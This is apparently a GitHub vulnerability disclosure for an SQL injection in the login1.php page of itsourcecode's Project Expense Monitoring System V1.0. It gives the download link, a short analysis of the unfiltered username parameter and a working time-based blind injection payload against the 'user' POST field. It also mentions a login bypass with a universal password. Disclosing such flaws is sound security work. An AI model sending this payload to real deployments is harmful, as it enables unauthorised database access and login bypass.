Skip to content

Latest commit

 

History

History
37 lines (23 loc) · 1.09 KB

CVE3-1.md

File metadata and controls

37 lines (23 loc) · 1.09 KB
Raw

Vendor

itsourcecode

Product

Project Expense Monitoring System

version

V1.0

Download

https://itsourcecode.com/wp-content/uploads/2021/03/Construction-Management-System-Project-In-PHP-Source-Code.zip

Vulnerability

SQLi

Description

On the login1.php login authentication page, attackers can construct SQL statements to obtain sensitive information from the database and use universal passwords to log in to the backend.

Analysis

In the login1.php page, the database query is performed through the mysqli_query method, and the input username string is not filtered enough, which can prevent XSS attacks, but cannot prevent SQLi injection. image image

POC

Parameter: user (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=admin' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))cTae) AND 'rmay'='rmay&pass=123